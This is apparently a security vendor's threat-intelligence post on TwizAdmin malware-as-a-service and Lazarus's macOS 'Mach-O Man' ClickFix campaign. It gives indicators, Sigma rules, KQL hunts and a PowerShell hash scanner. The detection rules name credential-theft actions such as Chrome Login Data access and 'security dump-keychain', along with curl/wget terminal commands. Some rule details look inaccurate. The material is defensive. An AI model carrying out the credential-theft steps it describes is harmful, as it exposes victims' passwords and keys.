Back to Intelligence

TwizAdmin MaaS & Lazarus Mach-O Man: OTX Pulse Analysis — Cross-Platform C2 & Credential Theft

SA
Security Arsenal Team
May 23, 2026
9 min read

Analysis of recent OTX pulses highlights a convergence of sophisticated, multi-platform threats targeting enterprise credentials and financial assets. The intelligence landscape is dominated by the emergence of the TwizAdmin Malware-as-a-Service (MaaS) operation, which offers a "all-in-one" commodity toolkit featuring crypto-clipping, infostealing, and ransomware capabilities (crpx0). Parallel to this commodity threat, the Lazarus Group is actively deploying a novel macOS-specific malware kit, "Mach-O Man," targeting the Finance and Technology sectors via social engineering.

The collective objective of these campaigns is financial enrichment through the systematic theft of cryptocurrency (via clipboard hijacking and seed phrase extraction), browser credentials, and session cookies. While TwizAdmin represents a broad, high-volume threat distributed via logistics-themed lures (FedEx), Lazarus utilizes a highly targeted ClickFix attack chain leveraging fraudulent collaboration platforms to deploy macOS payloads. Both campaigns rely heavily on obfuscated delivery mechanisms and establish persistent C2 channels for data exfiltration.

Threat Actor / Malware Profile

TwizAdmin (MaaS Operation)

  • Adversary: DataBreachPlus
  • Malware Families: TwizAdmin, crpx0 (Ransomware)
  • Distribution Method: Phishing campaigns impersonating logistics entities (e.g., FedEx) delivering multi-stage payloads targeting Windows and macOS.
  • Payload Behavior:
    • Crypto-Clipper: Hijacks clipboard to replace wallet addresses across eight blockchain networks.
    • Infostealer: Exfiltrates browser credentials, cookies, and BIP-39 seed phrases.
    • Ransomware: Deploys the 'crpx0' ransomware module.
    • Java RAT: Includes a Remote Access Trojan builder managed via a FastAPI-based C2 panel.
  • C2 Communication: Communicates with exposed C2 panels (e.g., 103.241.66[.]238:1337) over FastAPI, managed via a license key system.
  • Persistence Mechanism: Not explicitly detailed in the pulse, but likely involves standard persistence methods like scheduled tasks or launch agents given the multi-platform nature.
  • Anti-Analysis: Utilizes a FastAPI-based panel with license keys to restrict access, suggesting a level of operational security and obfuscation.

Lazarus Group (Mach-O Man Campaign)

  • Adversary: Lazarus Group (APT38)
  • Malware Families: Mach-O Man, PyLangGhostRAT
  • Distribution Method: ClickFix attacks initiated via fake meeting invitations on Telegram, redirecting to fraudulent collaboration sites impersonating Zoom, Microsoft Teams, or Google Meet. Victims are tricked into executing terminal commands.
  • Payload Behavior:
    • Mach-O Man: A newly identified macOS malware kit responsible for initial infection and payload delivery.
    • PyLangGhostRAT: A Python-based Remote Access Trojan for C2 and data exfiltration.
    • Credential Theft: Specifically targets browser-stored credentials for theft.
  • C2 Communication: Uses Telegram for exfiltration, a technique increasingly common for blending in with legitimate traffic and avoiding traditional network detection.
  • Persistence Mechanism: Likely uses macOS persistence mechanisms such as LaunchAgents or LaunchDaemons, though specific details are not in the pulse.
  • Anti-Analysis: ClickFix technique is inherently social-engineering focused, bypassing technical defenses by manipulating the user. The use of macOS may also provide a degree of evasion against traditional Windows-focused security stacks.

Middle East Malicious Infrastructure (Eagle Werewolf, ENERGETIC BEAR, etc.)

  • Adversaries: Eagle Werewolf, ENERGETIC BEAR, Velvet Tempest, APT28, GrayCharlie
  • Malware Families: Phorpiex, Twizt, XMRig, LockBit Black, EchoGather, Sliver, SoullessRAT, AquilaRAT, DYNOWIPER, RondoDox, Mirai, Phexia, HellsUchecker, Termite, NetSupport RAT, Tactical RMM, Keitaro, AsyncRAT, Cobalt Strike, Hajime, Mozi, Acunetix, Gophish, Prism X
  • Distribution Method: N/A (Infrastructure report)
  • Payload Behavior: Diverse, ranging from crypto-mining (XMRig) and ransomware (LockBit Black) to RATs (Sliver, AsyncRAT) and wipers (DYNOWIPER).
  • C2 Communication: 1,350+ active C2 servers identified across 98 providers in 14 Middle Eastern countries. A significant portion (96.8%) of detected activity is C2 communication.
  • Persistence Mechanism: Varies widely across the numerous malware families.
  • Anti-Analysis: Use of bulletproof hosting and widespread infrastructure makes takedown and detection difficult.

IOC Analysis

The provided indicators offer a multi-faceted view of the threat landscape:

  • Domains (fanonlyatn.xyz, livemicrosft.com): These are used for initial payload distribution (TwizAdmin) and as part of the ClickFix redirect chain (Lazarus). SOC teams should immediately block these domains at the perimeter (DNS sinkhole, proxy) and investigate any historical DNS queries or HTTP connections to these hosts. The livemicrosft.com domain is a textbook typosquatting attempt, indicative of social engineering.
  • FileHash-SHA256: 20+ unique hashes are provided, representing droppers, loaders, and core payloads for TwizAdmin, crpx0, and Mach-O Man. These can be operationalized in EDR solutions to block execution or generate alerts on file creation. The sheer number suggests a rapidly evolving campaign.
  • IPv4 Addresses (e.g., 37.32.15.8, 197.51.170.131): These IPs, mapped to various C2 servers across the Middle East, are critical for network-level detection. They should be added to Firewall blocklists and used to hunt for existing C2 beaconing activity in NetFlow or firewall logs. The high concentration of IPs linked to Saudi Arabia's STC (93.113.62.247) is a notable finding.
  • CVE (CVE-2025-11953): While the specific details are not in the pulse, the presence of a CVE suggests exploitation as a potential initial access or lateral movement vector. Security teams should prioritize patching for this specific vulnerability if it affects their environment.

SOC teams should use a combination of automated tools (SIEM, EDR, TIP) to ingest these IOCs. EDRs can be configured to block files by hash, while firewalls and proxies can block IP and domain indicators. A Threat Intelligence Platform (TIP) is ideal for correlating these IOCs with internal telemetry and identifying potentially compromised systems.

Detection Engineering

Sigma Rules

YAML
title: Potential TwizAdmin C2 Activity
id: 9c84e2e6-1b1a-4b0e-a9a6-7d9f9a9c9e9d
description: Detects potential network communication with a known TwizAdmin C2 panel infrastructure based on port usage and suspicious domain contact.
author: Security Arsenal
date: 2026/05/24
modified: 2026/05/24
references:
    - https://otx.alienvault.com/pulse/664fb7e7744e1b6475bc6653
tags:
    - attack.command_and_control
    - attack.t1071.001
logsource:
    category: network_connection
detection:
    selection:
        DestinationPort|contains:
            - 1337
        DestinationHostname|contains:
            - 'fanonlyatn.xyz'
    condition: selection
falsepositives:
    - Legitimate traffic to the specific domain on non-standard ports is unlikely.
level: high
---
title: Suspicious macOS Terminal Execution via ClickFix
id: 8f7d1a2b-3c4e-5f6a-7b8c-9d0e1f2a3b4c
description: Detects the execution of a suspicious command via macOS Terminal, a common technique in ClickFix attacks to download and execute malware like Mach-O Man.
author: Security Arsenal
date: 2026/05/24
modified: 2026/05/24
references:
    - https://otx.alienvault.com/pulse/664fb7e7744e1b6475bc6654
tags:
    - attack.execution
    - attack.t1059.004
logsource:
    category: process_creation
detection:
    selection:
        Image|endswith: '/Terminal.app/Contents/MacOS/Terminal'
        CommandLine|contains:
            - 'curl'
            - 'wget'
            - 'bash -c'
            - 'sh -c'
    filter_legitimate:
        ParentImage|contains:
            - 'iTerm2.app'
            - 'Visual Studio Code.app'
    condition: selection and not filter_legitimate
falsepositives:
    - Administrators running legitimate curl/wget commands from the Terminal.
level: medium
---
title: Multi-Platform Credential Stealer Detection (TwizAdmin & Mach-O Man)
id: 1a2b3c4d-5e6f-7a8b-9c0d-1e2f3a4b5c6d
description: Detects potential credential stealing activity by monitoring for access to browser credential files or keychains, a behavior common to both TwizAdmin and Mach-O Man.
author: Security Arsenal
date: 2026/05/24
modified: 2026/05/24
references:
    - https://otx.alienvault.com/pulse/664fb7e7744e1b6475bc6653
    - https://otx.alienvault.com/pulse/664fb7e7744e1b6475bc6654
tags:
    - attack.credential_access
    - attack.t1055
definition:
  # This is a high-level, cross-platform rule that should be adapted to specific EDR data sources.
  # Windows: Monitor for access to AppData\Local\Google\Chrome\User Data\Default\Login Data
  # macOS: Monitor for access to ~/Library/Application Support/Google/Chrome/Default/Login Data or 'security' command usage.
  # The condition below is a conceptual representation.
  selection_win:
    TargetFilename|contains: '\AppData\Local\Google\Chrome\User Data\Default\Login Data'
  selection_mac:
    TargetFilename|contains: '/Library/Application Support/Google/Chrome/Default/Login Data'
  selection_mac_keychain:
    Image|endswith: '/usr/bin/security'
    CommandLine|contains: 'dump-keychain'
  condition: 1 of selection*
falsepositives:
    - Legitimate backup or credential management tools accessing these files.
level: high

KQL (Microsoft Sentinel)

This KQL query hunts for network connections to the C2 IP addresses and domains mentioned in the pulses.

KQL — Microsoft Sentinel / Defender
let TwizAdminDomains = dynamic(["fanonlyatn.xyz", "livemicrosft.com"]);
let C2IPs = dynamic(["37.32.15.8", "197.51.170.131", "5.109.182.231", "93.113.62.247", "94.252.245.193"]);
DeviceNetworkEvents
| where (RemoteUrl in~ TwizAdminDomains or RemoteIP in~ C2IPs)
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName, InitiatingProcessCommandLine
| extend IoCType = iff(RemoteUrl in~ TwizAdminDomains, "Domain", "IP")
| order by Timestamp desc


This KQL query hunts for suspicious process creation on macOS, indicative of a ClickFix attack.

kql
DeviceProcessEvents
| where Timestamp >= ago(7d)
| where OSPlatform == "MacOS"
| where InitiatingProcessFileName == "Terminal"
| where ProcessCommandLine has_any ("curl", "wget", "bash -c", "sh -c") and not (InitiatingProcessParentFileName has_any ("iTerm", "Visual Studio Code"))
| project Timestamp, DeviceName, AccountName, InitiatingProcessFileName, ProcessCommandLine, InitiatingProcessParentFileName

PowerShell Hunt Script

This PowerShell script checks for the presence of file hashes associated with TwizAdmin or Mach-O Man on Windows endpoints. It can be run as part of an incident response investigation.

PowerShell
# Known malicious SHA256 hashes from the OTX pulses
$MaliciousHashes = @(
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092",
    "3fcd267e811d9b83cafa3d8d6932fa1c56f4fd8dcf46f9ec346e0689439532d4",
    "584796212f99efc7ac765d6048913fe34e46a64b13a8a78fb3a465b8c61f3527",
    "74ab520e94b2f3b8915ec7b47abab7a2d7e9759add5aa195af7edf0ffa5b4150",
    "9d9783f57fd543043e0792d125831883259c823a5eaa69211e5254db4db4eaec",
    "0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90",
    "24af069b8899893cfc7347a4e5b46d717d77994a4b140d58de0be029dba686c9",
    "4b08a9e221a20b8024cf778d113732b3e12d363250231e78bae13b1f1dc1495b",
    "85bed283ba95d40d99e79437e6a3161336c94ec0acbc0cd38599d0fc9b2e393c",
    "871d8f92b008a75607c9f1feb4922b9a02ac7bd2ed61b71ca752a5bed5448bf3",
    "89616a503ffee8fc70f13c82c4a5e4fa4efafa61410971f4327ed38328af2938",
    "a9562ab6bce06e92d4e428088eacc1e990e67ceae6f6940047360261b5599614"
)

Write-Host "[+] Scanning for known malicious file hashes..." -ForegroundColor Cyan

$DrivesToScan = @("C:")
$MatchesFound = @()

foreach ($Drive in $DrivesToScan) {
    Write-Host "[+] Scanning drive $Drive ..." -ForegroundColor Yellow
    # Note: Get-ChildItem -Recurse can be slow on large drives. In a production environment, consider limiting paths or using a pre-indexed file list.
    $Files = Get-ChildItem -Path $Drive -Recurse -ErrorAction SilentlyContinue | Where-Object { !$_.PSIsContainer }

    foreach ($File in $Files) {
        $FileStream = $null
        try {
            $FileStream = $File.OpenRead()
            $HashAlgorithm = [System.Security.Cryptography.SHA256]::Create()
            $HashBytes = $HashAlgorithm.ComputeHash($FileStream)
            $FileHash = [System.BitConverter]::ToString($HashBytes).Replace("-", "").ToLowerInvariant()

            if ($MaliciousHashes -contains $FileHash) {
                $MatchesFound += [PSCustomObject]@{
                    FilePath = $File.FullName
                    Hash     = $FileHash
                }
            }
        }
        catch {
            # Ignore access errors and other file read issues
        }
        finally {
            if ($null -ne $FileStream) { $FileStream.Close() }
        }
    }
}

if ($MatchesFound.Count -gt 0) {
    Write-Host "[!] ALERT: Found potential malicious files:" -ForegroundColor Red
    $MatchesFound | Format-Table -AutoSize
} else {
    Write-Host "[+] No files matching the known malicious hashes were found." -ForegroundColor Green
}


# Response Priorities

Immediate

  1. Block IOCs: Immediately block all domains (fanonlyatn.xyz, livemicrosft.com), IP addresses, and file hashes at the network perimeter (DNS, Firewall, Proxy) and endpoint (EDR). Prioritize these blocks for high-value assets in the Finance and Technology sectors.
  2. Hunt for Execution Artifacts: Execute the provided PowerShell/Bash scripts across the enterprise to identify any systems that may already be compromised. Focus on hunting for suspicious Terminal execution on macOS and unexpected process creation on Windows.

24h

  1. Credential Auditing: Given the infostealing nature of TwizAdmin and Mach-O Man, initiate a forced password reset and MFA re-enrollment campaign for all users, especially those with access to financial systems and cryptocurrency wallets. Review browser password manager logs for any suspicious export or access activities.
  2. Infrastructure Investigation: For organizations with a presence in the Middle East or with telecommunications providers (like STC) in their supply chain, investigate any network logs for connections to the identified C2 IP ranges. Correlate this with any alerts from the "Middle East Malicious Infrastructure" pulse.

1 Week

  1. Architecture Hardening: Conduct a security awareness refresher focused on identifying sophisticated phishing campaigns, especially those related to package delivery (TwizAdmin) and unexpected meeting invitations (ClickFix).
  2. Endpoint Security Review: Ensure EDR policies are configured to detect and block execution from non-standard directories, suspicious script interpreters (PowerShell, Bash), and unauthorized browser extensions. Review and harden macOS endpoint detection and response (EDR) coverage.
  3. Vulnerability Management: Investigate CVE-2025-11953 further, assess its impact on the environment, and expedite patching if critical vulnerabilities are found.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-apttwizadminmach-o-manlazarus-groupcredential-theftmacos-malware

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action